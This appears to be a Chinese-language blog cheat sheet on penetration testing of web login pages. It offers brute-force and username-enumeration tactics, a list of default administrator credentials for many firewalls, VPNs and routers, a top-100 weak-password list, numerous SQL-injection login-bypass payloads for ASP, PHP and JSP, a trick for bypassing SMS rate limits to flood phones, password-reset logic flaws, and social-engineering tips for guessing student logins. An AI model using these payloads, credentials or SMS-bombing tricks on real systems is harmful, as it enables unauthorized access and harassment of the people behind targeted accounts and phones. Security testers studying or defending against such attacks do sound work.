登錄界面-滲透測試

由圖展開思路：

 

登陸頁面的滲透測試

　　首先 在進入登陸界面時，一般都是先用萬能密碼什么的測下輸入框有沒有注入（現在很少見了）。如果沒有，那就先拿admin，123456什么的測試下弱口令，不求運氣爆棚一下就猜到密碼。主要是看下回顯，查看是否存在賬號鎖定策略，密碼不正確，不存在此用戶名等信息，以便於嘗試遍歷可能存在的用戶名。沒驗證碼就上爆破工具，有驗證碼的話看看能不能繞過,實在不行手工測幾個賬號密碼碰碰運氣。

　　爆破除了普通的用戶名密碼字典爆破，還有一種姿勢是固定密碼爆破用戶名。比如使用固定密碼123456，爆破常用用戶名或者常用人名拼音。

　　目錄掃描：說不定能掃描到后台未授權訪問的鏈接、備份文件、編輯器、敏感信息等。 fuzz工具試試 wfuzz

　　框架漏洞：

對一些CMS，已經比較成熟了，漏洞確實不好挖。如果網上（烏雲，seebug，搜索引擎等）的歷史漏洞沒有復現成功，那一般情況下就只能尋找下邏輯漏洞、網站管理員配置錯誤或者弱口令什么的。

對於一些不知名的框架，一般也可通過登陸界面底下的聲明中找到開發公司和產品版本時間。

在網上找找此公司產品是否爆出過漏洞。若是開源的框架，還可下載源碼進行代碼審計尋找漏洞。

像java的站，登陸頁面是.do或.action的網址。可嘗試下 struts2 命令執行漏洞，本人一般使用安恆的S2漏洞驗證工具。

　　弱口令：

次數 密碼
392 123456
281 a123456
165 123456a
161 5201314
157 111111
136 woaini1314

遇到網絡設備，基本像交換機、路由器、安全設備之類的，可以嘗試一下默認密碼

參考：

天融信防火牆，不需要證書 登錄地址:https://192.168.1.254 用戶名:superman 密碼:talent 技術支持熱線：8008105119
天融信防火牆，不需要證書 登錄地址:https://192.168.1.254：8080 用戶名:superman 密碼:talent！23 遇到設備需要把舊設備配置備份下來，再倒入新設備基於console口登陸，用戶名，密碼跟web界面一致 system config reset 清除配置 save 保存 聯想網御防火牆，需要證書（最好用IE瀏覽器登錄）
登錄地址:https://10.1.5.254:8889 用戶名:admin 密碼:leadsec@7766、administrator、bane@7766 技術支持熱線：4008107766 010-56632666
深信服防火牆（注安全設備管理地址不是唯一的） https://10.251.251.251
https://10.254.254.254 用戶名：admin 密碼：admin 技術支持熱線：4006306430
啟明星辰 https://10.1.5.254:8889 用戶名：admin 密碼：bane@7766
https://10.50.10.45:8889 用戶名：admin 密碼：admin@123 電腦端IP：10.50.10.44/255.255.255.0 技術支持熱線：4006243900
juniper 登錄地址:https://192.168.1.1 用戶名:netscreen 密碼:netscreen
Cisco 登錄地址:https://192.168.0.1 用戶名:admin 密碼:cisco
Huawei 登錄地址:http://192.168.0.1 用戶名:admin 密碼:Admin@123
H3C 登錄地址:http://192.168.0.1 用戶名:admin 密碼:admin 技術支持熱線：4006306430
綠盟IPS https://192.168.1.101 用戶名: weboper 密碼: weboper 配置重啟生效
網神防火牆GE1口 https://10.50.10.45 用戶名：admin 密碼：firewall 技術支持熱線：4006108220
深信服VPN： 51111端口 delanrecover
華為VPN：賬號：root 密碼：mduadmin
華為防火牆： admin Admin@123 eudemon
eudemon Juniper防火牆： netscreen netscreen
迪普 192.168.0.1 默認的用戶名和密碼（admin/admin_default)
山石 192.168.1.1 默認的管理賬號為hillstone，密碼為hillstone
安恆的明御防火牆 admin/adminadmin
某堡壘機 shterm/shterm
天融信的vpn test/123456

 

社工：

像教育站，登陸賬號可能是學號，密碼是身份證后六位。百度查xxx學校一卡通丟失，一般就能從某學生的失物啟示找到學號。

或者在文章標題下，若存在作者名字，可能就是用戶名

密碼除結合管理員電話，qq，姓名等外，還可注意下網站的一些關鍵詞。

 社工密碼字典生成, 在線網站生成：http://tools.mayter.cn/

 hashcat這款爆破工具也能生成社工字典

 

邏輯漏洞：
雲短信接受平台：

https://www.pdflibr.com/

http://www.smszk.com/

越權：更改返回包，禁用js文件、審查網站源碼、

快速在網站的js文件中提取URL，子域名的工具：JSFinder

 

• 密碼明文傳輸

• 敏感數據明文傳輸

  敏感數據明文傳輸簡單點來說就是當我們在網站上面提交敏感數據到服務器的過程中未進行相關加密處理，導致攻擊者通過中間人攻擊方式（劫持、嗅探等）即可獲取到這些未加密的敏感數據。當攻擊者獲取到這些數據之后，就可以用這些信息以合法用戶的身份進入到應用系統中——甚至可能進入到應用系統后台中，一旦進入到應用系統中那么就可以獲取更多的敏感數據，以及更有機會發現更多的漏洞。

  目前很多網站都是站庫分離（站點與站點的數據庫在不同的服務器上），獲取了站點的權限不一定就會獲取到更多的敏感數據更或是數據庫的訪問權限，可能連應用系統后台都進不去，使用嗅探呢？如果站點是使用https進行傳輸的，嗅探能成功嗎？答案是否定的！下面將詳細介紹關於對敏感數據明文傳輸漏洞如何利用的過程！

  初驗敏感數據是否是明文傳輸

  我們如何判斷一個網站的登錄（下面將統一以登錄的賬號及密碼作為敏感數據進行測試）是否是明文傳輸。一是使用抓包工具，二是使用瀏覽器自帶的功能！推薦使用瀏覽器自帶的功能，使用抓包的話推薦使用burpsuite，只是抓取https的數據包時需要提前進行額外的配置——安裝burpsuite的CA證書，具體配置見官方配置。

  首先通過火狐瀏覽器的F12功能，我們選擇【網絡】模塊，並點擊HTML進行篩選，如圖1所示：

  

  圖1 設置火狐瀏覽器

         然后點擊登錄即可獲取到post或者get的請求頭及請求主體的內容，如圖2所示，就獲取到了http明文登錄的敏感數據了。

  

  圖2 獲取http敏感數據

         通過使用burpsuite進行抓包也是一樣的，只要配置好了burpsuite，我們也可以抓取這些敏感數據，如圖3所示：

  

  圖3 獲取http明文數據

• 任意用戶注冊
  

  注冊的地方,很簡單
  http://www.homeinns.com/member/register#

  

  
  注冊成功了幾個:13444444441,13444444442

  
  如家酒店積分商城任意用戶注冊漏洞\任意積分兌換 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0165121

• 忘記密碼處邏輯漏洞
  

  案例介紹： 問題出現在忘記密碼處，可以通過手機找回和郵箱找回密碼兩種方式獲得指定帳戶的新密碼設置權限

  進入忘記密碼，填寫想要獲取權限帳號的ID

  獲得url

  

  選擇郵箱找回

  

  獲得url:

  

  系統已將新密碼設置url發送給郵箱

  此時只需要將前面獲取的url修改一下

  

  即可獲得設置該用戶新密碼的權限

  

• 短信、郵件炸彈
  

  現在的很多項目都少不了給用戶手機號或者郵箱賬號發短信郵件之類的，但是很多發送短信都是借助於第三方接口來發送短信的，這樣一來，發送的短信就是有限制的，收費的哦。如果系統做的不太好，有些小漏洞，被白帽子發現還好，要是被那些黑帽子發現了，少則幾千，嚴重者可能導致公司倒閉啊。即使不被黑帽子攻擊，有些惡意的用戶也可能對我們的系統進行破壞，上一個項目的2.0版本，就正好碰上這種事情，漏洞被惡意用戶發現了，拿來玩耍，結果導致公司一夜之間少了好幾千，老大只好讓人連夜修補漏洞，前車之鑒，我們要把別人撞到頭破血流的經驗拿來當做自己的經驗，所以說還是謹慎些好，做好一些能想到的安全措施。

        看一下他們是怎么發送短信炸彈的

  右下角，編輯和重發，輸入手機號就不停的發送短信了，你可知道這些短信都是公司花錢買的，就因為漏洞暴露在別人面前，他們拿來玩耍，就給公司帶來很多不必要的損失，所以一定要注意項目的各種安全隱患。

  解決辦法：就是每個手機號每天只能發送5次短信，每個ip每分鍾只能發送1次
  
  

短信轟炸，一般人可能抓包重放失敗后就放棄了。這里有個技巧，

是從西門吹雪師傅博文里學到的繞過的姿勢：

發送短信處一般每隔60秒才能發送一次

但若是發包時在手機號后加上一個空格、加號或換行符等特殊字符。然后重新發送，這時若發送成功，則說明可繞過限制。

此時在intruder模塊只要持續遞增空格就可造成無限短信轟炸

參考鏈接：http://ximcx.cn/post-143.html

 

 

• 弱口令
  

  頻率比較高的公共弱口令：

  （Top 100）：

  123456 a123456 123456a 5201314 111111 woaini1314 qq123456 123123 000000 1qaz2wsx 1q2w3e4r

  qwe123 7758521 123qwe a123123 123456aa woaini520 woaini 100200 1314520 woaini123 123321

  q123456 123456789 123456789a 5211314 asd123 a123456789 z123456 asd123456 a5201314 aa123456

  zhang123 aptx4869 123123a 1q2w3e4r5t 1qazxsw2 5201314a 1q2w3e aini1314 31415926 q1w2e3r4

  123456qq woaini521 1234qwer a111111 520520 iloveyou abc123 110110 111111a 123456abc w123456

  7758258 123qweasd 159753 qwer1234 a000000 qq123123 zxc123 123654 abc123456 123456q qq5201314

  12345678 000000a 456852 as123456 1314521 112233 521521 qazwsx123 zxc123456 abcd1234 asdasd

  666666 love1314 QAZ123 aaa123 q1w2e3 aaaaaa a123321 123000 11111111 12qwaszx 5845201314

  s123456 nihao123 caonima123 zxcvbnm123 wang123 159357 1A2B3C4D asdasd123 584520 753951 147258

  1123581321 110120 qq1314520

  對於網站后台而言，一般為：

  admin

  manager

  admin123

  admin888

  admin666

  具體來說，不同的后台類型擁有不同的弱密碼：

  數據庫（phpmyadmin）：賬號：root，密碼：root、root123、123456

  tomcat：賬號：admin、tomcat、manager，密碼：admin、tomcat、admin123、123456、manager

  jboss：賬號：admin、jboss、manager，密碼：admin、jboss、manager、123456

  weblogic：賬號：weblogic、admin、manager，密碼：weblogic、admin、manager、123456

• 萬能密碼
  asp aspx萬能密碼
    1： "or "a"="a
     2： ')or('a'='a
     3：or 1=1--
     4：'or 1=1--
     5：a'or' 1=1--
     6： "or 1=1--
     7：'or'a'='a
     8： "or"="a'='a
     9：'or''='
     10：'or'='or'
     11: 1 or '1'='1'=1
     12: 1 or '1'='1' or 1=1
     13: 'OR 1=1%00
     14: "or 1=1%00
     15: 'xor
     16: 新型萬能登陸密碼
  
     用戶名 ' UNION Select 1,1,1 FROM admin Where ''=' （替換表名admin）
     密碼 1
     Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
     Password=1
     17..admin' or 'a'='a 密碼隨便
  

   

     PHP萬能密碼
     'or'='or'
    
     'or 1=1/*  字符型 GPC是否開都可以使用
  
     User: something
     Pass: ' OR '1'='1
  
     jsp 萬能密碼
     1'or'1'='1
     admin' OR 1=1/*
     用戶名：admin    系統存在這個用戶的時候 才用得上
     密碼：1'or'1'='1
  
  
  
• 登錄繞過
  后台驗證密碼SQL語句：
  sql = "select * from Manage_User whereUserName='" & name & "' AndPassWord='"&encrypt(pwd)&"'" 將用戶名和密碼放入查詢語句中查詢數據庫，
  

  在用戶名處提交'or'='or'，這樣就使得SQL語句變成：select* from Manage_User where UserName='’or‘='or'' And PassWord='123456'。（（假or真or假and（真/假））=真）執行后得到rs對象的結果為真，這樣就能順利的進入后台了。

  

   

   

  
  
• 用戶名枚舉
  

  漏洞描述：存在於系統登陸頁面，利用登陸時的輸入系統純在的用戶名錯誤或不存在用戶名或者密碼錯誤，返回不同的出錯信息可枚舉出系統中存在的賬號信息。

  檢測條件：web登陸頁面，登陸錯誤回顯不一致

  檢測方法：登陸頁面通過手工測試，嘗試登陸查看回顯內容！！！
  　　           通過burpsuite 爆破用戶名，對比返回包數據大小即可，
  
  WordPress 用戶名枚舉漏洞 CVE-2017-5487 WordPress < 4.7.1 - Username Enumeration

• 驗證碼缺失

• 驗證碼可識別

• 驗證碼返回

• 驗證碼失效

• 萬能驗證碼（0000）

• 驗證碼空繞過

• 短信驗證碼可爆破

 

 

 

 

 

 

 

 

雖然滲透比較艱難，但也培養了我的漏洞挖掘能力。反思下自己以前挖漏洞，都是走馬觀花，面對信息收集來的一大堆資產，都是隨便測下就結束，並沒有深入且細心地去尋找漏洞，導致之前的SRC挖掘之旅十分困難。因此希望新手在挖洞時能夠更加細心，特別是挖掘SRC時，有時就得花時間一個參數一個參數去”懟”，才能有所收獲。要相信，大力出奇跡！